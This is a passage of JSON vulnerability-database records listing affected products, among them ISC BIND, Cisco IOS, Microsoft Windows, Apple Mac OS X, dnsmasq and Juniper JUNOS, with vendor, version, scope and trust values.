            "model": "application \u0026 content networking software",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "sun",
            "version": "snv_95"
          },
          {
            "_id": null,
            "model": "windows xp home sp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "matsumoto ruby",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.9-1"
          },
          {
            "_id": null,
            "model": "ios 12.3b",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "computing cyberguard tsp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "_id": null,
            "model": "bind a1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.5"
          },
          {
            "_id": null,
            "model": "dnsmasq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dnsmasq",
            "version": "2.35"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 95",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "networks adonis",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecat",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.2.3.9"
          },
          {
            "_id": null,
            "model": "networks pmbb",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "networks junos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "rt140i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "tcp/ip services for openvms alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.4"
          },
          {
            "_id": null,
            "model": "rt105i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2.11"
          },
          {
            "_id": null,
            "model": "windows server datacenter edition sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003x64"
          },
          {
            "_id": null,
            "model": "mpe/ix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "enterprise linux es ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "netware sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "novell",
            "version": "6.5"
          },
          {
            "_id": null,
            "model": "computing sidewinder",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "networks screenos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows server enterprise edition itanium",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "20030"
          },
          {
            "_id": null,
            "model": "3-dns",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.6"
          },
          {
            "_id": null,
            "model": "ios 12.3yh",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2zh",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "-par",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "pdnsd",
            "version": "1.2.7"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.5"
          },
          {
            "_id": null,
            "model": "windows xp professional edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "x64"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.4.3"
          },
          {
            "_id": null,
            "model": "coat systems packetshaper",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "0"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.4"
          },
          {
            "_id": null,
            "model": "ios 12.3xi",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "computing sidewinder software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.2.1"
          },
          {
            "_id": null,
            "model": "networks junose p0-2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "5.3.5"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "-par",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "pdnsd",
            "version": "1.2.2"
          },
          {
            "_id": null,
            "model": "iphone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.0.1"
          },
          {
            "_id": null,
            "model": "computing sidewinder",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.2.0.03"
          },
          {
            "_id": null,
            "model": "bind p6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.2.2"
          },
          {
            "_id": null,
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.17"
          },
          {
            "_id": null,
            "model": "networks junos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "12.2"
          },
          {
            "_id": null,
            "model": "security gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "astaro",
            "version": "7"
          },
          {
            "_id": null,
            "model": "river systems linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wind",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.4"
          },
          {
            "_id": null,
            "model": "mpe/ix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.5"
          },
          {
            "_id": null,
            "model": "storage management appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1.11.6"
          },
          {
            "_id": null,
            "model": "ios 12.3xb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server enterprise edition itanium sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "networks adonis",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecat",
            "version": "4.1.43"
          },
          {
            "_id": null,
            "model": "bind a5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "computing sidewinder software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.0.0.03"
          },
          {
            "_id": null,
            "model": "rtx3000",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "messaging application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "0"
          },
          {
            "_id": null,
            "model": "bigip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.6.4"
          },
          {
            "_id": null,
            "model": "network registar",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "bind b3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "ios 12.2zl",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "computing sidewinder",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.2.1.02"
          },
          {
            "_id": null,
            "model": "windows xp tablet pc edition sp3",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "bigip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.3"
          },
          {
            "_id": null,
            "model": "bind b4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.3.7"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.3.0"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4.3"
          },
          {
            "_id": null,
            "model": "matsumoto ruby",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.8.6"
          },
          {
            "_id": null,
            "model": "bind rc3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.3.3"
          },
          {
            "_id": null,
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2008.1"
          },
          {
            "_id": null,
            "model": "solaris 8 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "linux lts amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "vitalqip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "lucent",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "vitalqip sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "lucent",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "ios 12.3xw",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.3.2"
          },
          {
            "_id": null,
            "model": "computing sidewinder",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.0.0.02"
          },
          {
            "_id": null,
            "model": "linux alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.3.4"
          },
          {
            "_id": null,
            "model": "windows server web edition sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "linux mipsel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "ipcop",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.19"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.1"
          },
          {
            "_id": null,
            "model": "bind -p1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.6"
          },
          {
            "_id": null,
            "model": "netware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "novell",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "access gateway standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "4.5.7"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.2"
          },
          {
            "_id": null,
            "model": "windows server sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows advanced server sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "rtx1100",
            "scope": null,
            "trust": 0.3,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "matsumoto ruby -p229",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.8.6"
          },
          {
            "_id": null,
            "model": "ios 12.0wc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xk",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "matsumoto ruby -p115",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.8.5"
          },
          {
            "_id": null,
            "model": "networks self-service ccss7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-0"
          },
          {
            "_id": null,
            "model": "computing sidewinder",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.2.0.04"
          },
          {
            "_id": null,
            "model": "computing cyberguard classic",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.3"
          },
          {
            "_id": null,
            "model": "3-dns",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.5.13"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.2.2"
          },
          {
            "_id": null,
            "model": "matsumoto ruby -p286",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.8.6"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "netware sp5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "novell",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "bigip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.6.1"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 19",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "tcp/ip services for openvms integrity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.5"
          },
          {
            "_id": null,
            "model": "netscaler build",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "8.157.3"
          },
          {
            "_id": null,
            "model": "ios 12.3yx",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "computing sidewinder software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.1.1"
          },
          {
            "_id": null,
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.11"
          },
          {
            "_id": null,
            "model": "matsumoto ruby -p22",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.8.7"
          },
          {
            "_id": null,
            "model": "windows server datacenter edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "matsumoto ruby -p230",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.8.6"
          },
          {
            "_id": null,
            "model": "access gateway standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "4.5.6"
          },
          {
            "_id": null,
            "model": "computing sidewinder",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.2.1"
          },
          {
            "_id": null,
            "model": "networks nsna switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "4070"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.2.3"
          },
          {
            "_id": null,
            "model": "ios 12.1ay",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "rt105p",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "bind beta",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.2.3"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.5"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.3.2"
          },
          {
            "_id": null,
            "model": "ios 12.2by",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "pardus",
            "version": "20070"
          },
          {
            "_id": null,
            "model": "bind 9.5.0a7",
            "scope": null,
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.5"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.4"
          },
          {
            "_id": null,
            "model": "networks self-service peri workstation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "windows advanced server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "vitalqip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "lucent",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "3-dns",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.6.1"
          },
          {
            "_id": null,
            "model": "ios 12.2b",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "computing sidewinder",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.0.0.03"
          },
          {
            "_id": null,
            "model": "matsumoto ruby",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.8"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1.13.7"
          },
          {
            "_id": null,
            "model": "networks optical software upgrade manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "bind b1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "12.4"
          },
          {
            "_id": null,
            "model": "bigip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 89",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server standard edition sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "ios 12.2xu",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.4"
          },
          {
            "_id": null,
            "model": "ipcop",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.20"
          },
          {
            "_id": null,
            "model": "windows datacenter server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "bind 9.5.1b1",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "open-enterprise-server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "0"
          },
          {
            "_id": null,
            "model": "coat systems packetshaper",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "blue",
            "version": "8.4"
          },
          {
            "_id": null,
            "model": "windows professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "rt102i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "bind a4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.3.7"
          },
          {
            "_id": null,
            "model": "linux ia-64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "tcp/ip services for openvms alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.5"
          },
          {
            "_id": null,
            "model": "bind 9.5.0a6",
            "scope": null,
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "networks adonis",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecat",
            "version": "5.1.8"
          },
          {
            "_id": null,
            "model": "rtv01",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ios 12.2ze",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "bigip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4.3"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.10"
          },
          {
            "_id": null,
            "model": "ipod touch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.1.3"
          },
          {
            "_id": null,
            "model": "windows xp home sp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "tcp/ip services for openvms integrity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.6"
          },
          {
            "_id": null,
            "model": "networks ensm enterprise nms",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-10.4"
          },
          {
            "_id": null,
            "model": "networks junos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "ios 12.4xa",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xg",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.1"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.3.5"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4"
          },
          {
            "_id": null,
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.1"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.2"
          },
          {
            "_id": null,
            "model": "network registar",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "computing sidewinder",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.1.1"
          },
          {
            "_id": null,
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.10"
          },
          {
            "_id": null,
            "model": "bigip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.6"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "rta54i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ios 12.3xc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "coat systems packetshaper",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "blue",
            "version": "8.3.2"
          },
          {
            "_id": null,
            "model": "windows server enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "bind p2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.2.2"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.5"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.3"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.6"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0.1"
          },
          {
            "_id": null,
            "model": "hat enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "3"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.4.1"
          },
          {
            "_id": null,
            "model": "djbdns",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "djbdns",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ios 12.3ys",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "4,0 beta",
            "scope": null,
            "trust": 0.3,
            "vendor": "netbsd",
            "version": null
          },
          {
            "_id": null,
            "model": "matsumoto ruby pre1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.8.2"
          },
          {
            "_id": null,
            "model": "bigip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.6"
          },
          {
            "_id": null,
            "model": "ios 12.4xl",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "bind rc2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.7"
          },
          {
            "_id": null,
            "model": "ios 12.4xt",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1.1"
          },
          {
            "_id": null,
            "model": "networks junos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "7.3"
          },
          {
            "_id": null,
            "model": "windows server standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003x64"
          },
          {
            "_id": null,
            "model": "networks adonis",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecat",
            "version": "5.1.1"
          },
          {
            "_id": null,
            "model": "multi network firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "ipod touch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.1.2"
          },
          {
            "_id": null,
            "model": "bind a1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.3"
          },
          {
            "_id": null,
            "model": "net-dns/dnsmasq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "gentoo",
            "version": "2.43"
          },
          {
            "_id": null,
            "model": "bind p7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.2.2"
          },
          {
            "_id": null,
            "model": "ios 12.2xc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "bind rc1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.7"
          },
          {
            "_id": null,
            "model": "networks self-service mps",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1000"
          },
          {
            "_id": null,
            "model": "windows advanced server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
